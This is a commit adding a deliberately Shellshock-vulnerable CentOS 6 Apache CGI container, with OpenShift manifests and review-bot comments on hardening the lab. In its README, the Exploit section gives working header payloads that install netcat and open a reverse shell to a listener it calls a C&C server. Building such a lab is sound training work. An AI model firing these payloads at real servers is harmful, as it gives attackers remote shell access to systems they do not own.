
initial commit

main
Nicolas Massé 5 years ago
commit
0a2893663f
  1. 5
      shellshock/Dockerfile
  2. 83
      shellshock/README.md
  3. 10
      shellshock/openshift/00-namespace.yaml
  4. 32
      shellshock/openshift/10-deploy.yaml
  5. 17
      shellshock/openshift/20-svc.yaml
  6. 17
      shellshock/openshift/30-route.yaml
  7. 18
      shellshock/rootfs/entrypoint.sh
  8. 35
      shellshock/rootfs/etc/yum.repos.d/CentOS-Base.repo
  9. 5
      shellshock/rootfs/var/www/cgi-bin/hello.cgi

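--- a/shellshock/Dockerfile
+++ b/shellshock/Dockerfile
@@ -0,0 +1,5 @@
+FROM vulnerable-centos:6
+COPY rootfs .
+RUN yum install -y httpd
+EXPOSE 80 443
+ENTRYPOINT ["/entrypoint.sh"]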
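Review bot: `EXPOSE 80 443` on the fourth line advertises a TLS port that nothing in this commit configures — the entrypoint starts httpd with its default configuration, and the Service and Route under openshift/ only target port 80 — so the 443 entry is misleading metadata; change it to `EXPOSE 80`, or add the mod_ssl configuration that would justify it. The image also never sets `USER`, and the imported base tarball presumably has none either, so httpd's parent process runs as root inside the container; that is likely what the lab wants, but a label such as `LABEL description="Intentionally vulnerable Shellshock lab image - run only in an isolated environment"` would make the intent explicit to anyone who pulls the image from the registry.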

83
shellshock/README.md

@ -0,0 +1,83 @@
# Shellshock vulnerable image
## Build
Old CentOS images are here: https://vault.centos.org/
Install it in a virtual machine.
```sh
sudo virt-install --name centos6 --os-variant centos6.5 --memory 2048 --vcpus 2 --disk size=10,alias.name=centos6 --hvm --network network=default --cdrom /var/lib/libvirt/images/CentOS-6.5-x86_64-minimal.iso
```
Mount the qcow2 image as explained [here](https://gist.github.com/shamil/62935d9b456a6f9877b5).
```sh
sudo qemu-nbd --connect=/dev/nbd0 /var/lib/libvirt/images/disk.qcow2
sudo mount /dev/mapper/VolGroup-lv_root /mnt/
sudo tar -cvf /tmp/centos6.tar . -C /mnt
sudo umount /mnt
sudo qemu-nbd --disconnect /dev/nbd0
```
Create the container image.
```sh
sudo podman import /tmp/centos6.tar vulnerable-centos:6
sudo buildah bud -t vulnerable-httpd:centos-6 .
```
Push the image to the registry of your choice.
```sh
sudo podman tag localhost/vulnerable-httpd:centos-6 registry.itix.xyz/vulnerable/vulnerable-httpd:centos-6
sudo podman push registry.itix.xyz/vulnerable/vulnerable-httpd:centos-6
```
## Usage
```sh
sudo podman run -d --rm --name vulnerable-httpd vulnerable-httpd:centos-6
POD_IP=$(sudo podman inspect --format "{{.NetworkSettings.IPAddress}}" vulnerable-httpd)
```
```
sh-4.1# curl http://$POD_IP/cgi-bin/hello.cgi -H "X-Name: Nicolas"
Hello, Nicolas!
sh-4.1# curl http://$POD_IP/cgi-bin/hello.cgi
Hello, World!
```
## Deployment
```sh
oc apply -f openshift/
```
## Exploit
Find the URL of the vulnerable CGI-BIN.
```sh
export TARGET="https://$(oc get route frontend -n vulnerable-httpd -o jsonpath="{.spec.host}")/cgi-bin/hello.cgi"
```
Start a C&C server.
```sh
sudo firewall-cmd --add-port 6666/tcp
nc -l -p 6666
```
Set the IP address of the C&C server.
```sh
export SERVER_IP=192.168.6.2
```
Exploit the target.
```sh
curl "$TARGET" -H "X-Name: () { :; }; /usr/bin/yum install -y nc"
curl "$TARGET" -H "X-Name: () { :; }; /bin/bash -i >& /dev/tcp/$SERVER_IP/6666 0>&1"
```

10
shellshock/openshift/00-namespace.yaml

@ -0,0 +1,10 @@
apiVersion: v1
kind: Namespace
metadata:
annotations:
openshift.io/description: ""
openshift.io/display-name: ""
name: vulnerable-httpd
spec:
finalizers:
- kubernetes
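Review bot: Both `openshift.io/description` and `openshift.io/display-name` are set to empty strings, which is `oc get` export noise rather than configuration. Either drop the two annotations or fill them, e.g. `openshift.io/description: "Intentionally vulnerable Shellshock lab - keep isolated from production traffic"`, so the project's purpose is visible in the console to whoever later finds a namespace named vulnerable-httpd.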

32
shellshock/openshift/10-deploy.yaml

@ -0,0 +1,32 @@
apiVersion: apps/v1
kind: Deployment
metadata:
labels:
app: frontend
app.kubernetes.io/component: frontend
app.kubernetes.io/instance: frontend
name: frontend
namespace: vulnerable-httpd
spec:
replicas: 1
selector:
matchLabels:
deployment: frontend
template:
metadata:
creationTimestamp: null
labels:
deployment: frontend
spec:
containers:
- image: registry.itix.xyz/vulnerable/vulnerable-httpd:centos-6
imagePullPolicy: IfNotPresent
name: frontend
resources: {}
terminationMessagePath: /dev/termination-log
terminationMessagePolicy: File
dnsPolicy: ClusterFirst
restartPolicy: Always
schedulerName: default-scheduler
securityContext: {}
terminationGracePeriodSeconds: 30
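Review bot: `securityContext: {}` and `resources: {}` leave this pod with neither privilege nor resource constraints, which matters doubly for an image whose whole purpose is to be compromised through its CGI. At minimum set limits, e.g. `resources: {limits: {cpu: "500m", memory: "256Mi"}}` (example values), so a shell obtained through the lab cannot starve the node, and pair the Deployment with a NetworkPolicy that confines the pod's egress to what the exercise actually needs. The entrypoint binds port 80 via apachectl, so under OpenShift's default restricted SCC, which assigns an arbitrary non-root UID, the container presumably needs an SCC grant or a non-privileged port before it will start — worth stating in the README next to `oc apply -f openshift/`. The `creationTimestamp: null` line is export noise and can be dropped.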

17
shellshock/openshift/20-svc.yaml

@ -0,0 +1,17 @@
apiVersion: v1
kind: Service
metadata:
labels:
app: frontend
name: frontend
namespace: vulnerable-httpd
spec:
ports:
- name: http
port: 80
protocol: TCP
targetPort: 80
selector:
deployment: frontend
sessionAffinity: None
type: ClusterIP

17
shellshock/openshift/30-route.yaml

@ -0,0 +1,17 @@
apiVersion: route.openshift.io/v1
kind: Route
metadata:
labels:
app: frontend
name: frontend
namespace: vulnerable-httpd
spec:
port:
targetPort: http
tls:
termination: edge
to:
kind: Service
name: frontend
weight: 100
wildcardPolicy: None
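Review bot: The Route publishes the vulnerable CGI on a router-generated public hostname with no access restriction; `termination: edge` only encrypts the client leg and does nothing to limit who can reach the endpoint. For a deliberately exploitable service, restrict the source addresses with the router's allow-list annotation, e.g. `haproxy.router.openshift.io/ip_whitelist: "192.168.6.0/24"` (example range), or state in the README that the lab must run on an isolated cluster. `spec.host` is left to the router default, so the README's `oc get route ... -o jsonpath` lookup remains the right way to discover it.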

18
shellshock/rootfs/entrypoint.sh

@ -0,0 +1,18 @@
#!/bin/sh
# Stop the scrip on any error encountered
set -Eeuo pipefail
# Start a test instance of apache
/usr/sbin/apachectl -k start
sleep 2
# Run a test query
curl -s http://localhost/cgi-bin/hello.cgi -H "X-Name: OpenShift"
# Stop apache
/usr/sbin/apachectl -k stop
sleep 2
# Run the real apache
exec /usr/sbin/httpd -X
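Review bot: The shebang `#!/bin/sh` does not match `set -Eeuo pipefail` on the next line — `-E` and `pipefail` are bash options, so under a POSIX `sh` such as dash the script aborts there before httpd is ever started; use `#!/bin/bash` (on CentOS 6 `/bin/sh` is bash, which is why this works today). The comment on line 2 reads "scrip"; fix to "script". The smoke test sends `X-Name: OpenShift` to the CGI but never inspects the reply, so with `curl -s` a broken CGI only surfaces if curl itself exits non-zero; comparing the output against `Hello, OpenShift!` would make the check meaningful. Note that `apachectl -k stop` returns before the listener is necessarily gone, so the `sleep 2` before `httpd -X` is a timing guess rather than a guarantee.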

35
shellshock/rootfs/etc/yum.repos.d/CentOS-Base.repo

@ -0,0 +1,35 @@
[base]
name=CentOS-$releasever - Base
baseurl=https://vault.centos.org/6.5/os/$basearch/
gpgcheck=1
gpgkey=file:///etc/pki/rpm-gpg/RPM-GPG-KEY-CentOS-6
#released updates
[updates]
name=CentOS-$releasever - Updates
baseurl=http://vault.centos.org/6.5/updates/$basearch/
gpgcheck=1
gpgkey=file:///etc/pki/rpm-gpg/RPM-GPG-KEY-CentOS-6
#additional packages that may be useful
[extras]
name=CentOS-$releasever - Extras
baseurl=http://vault.centos.org/6.5/extras/$basearch/
gpgcheck=1
gpgkey=file:///etc/pki/rpm-gpg/RPM-GPG-KEY-CentOS-6
#additional packages that extend functionality of existing packages
[centosplus]
name=CentOS-$releasever - Plus
baseurl=http://vault.centos.org/6.5/centosplus/$basearch/
gpgcheck=1
enabled=0
gpgkey=file:///etc/pki/rpm-gpg/RPM-GPG-KEY-CentOS-6
#contrib - packages by Centos Users
[contrib]
name=CentOS-$releasever - Contrib
baseurl=http://vault.centos.org/6.5/contrib/$basearch/
gpgcheck=1
enabled=0
gpgkey=file:///etc/pki/rpm-gpg/RPM-GPG-KEY-CentOS-6
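Review bot: `[base]` fetches over https while `[updates]`, `[extras]`, `[centosplus]` and `[contrib]` use plain `http://vault.centos.org/...`; with `gpgcheck=1` the package signatures are still verified, but the repository metadata is not (that requires `repo_gpgcheck=1`), so an on-path party could feed stale metadata to the `yum install` in the Dockerfile. Use `https://` for every `baseurl`, as the first stanza already does, and add `repo_gpgcheck=1` if the vault publishes signed repomd.xml for 6.5. A one-line header comment noting that the repos are pinned to the frozen 6.5 tree on purpose, so the lab stays on pre-fix packages, would stop a well-meaning maintainer from "upgrading" them.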

5
shellshock/rootfs/var/www/cgi-bin/hello.cgi

@ -0,0 +1,5 @@
#!/bin/sh
echo "Content-Type: text/plain"
echo
echo "Hello, ${HTTP_X_NAME:-World}!"
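Review bot: The script carries no comment saying what makes it the lab's vulnerable endpoint; its own logic is harmless (the header value is only echoed into a `text/plain` body), and the exploit path depends entirely on `/bin/sh` resolving to a Shellshock-affected bash that parses the `HTTP_X_NAME` environment variable handed over by httpd. A header such as `# Intentionally vulnerable: relies on /bin/sh being an unpatched (Shellshock-affected) bash on the base image.` and `# If the base image or its bash changes, this CGI silently stops being exploitable.` would preserve that intent for the next maintainer. The section reports 5 additions but shows four lines, so a trailing blank line is presumably lost in rendering.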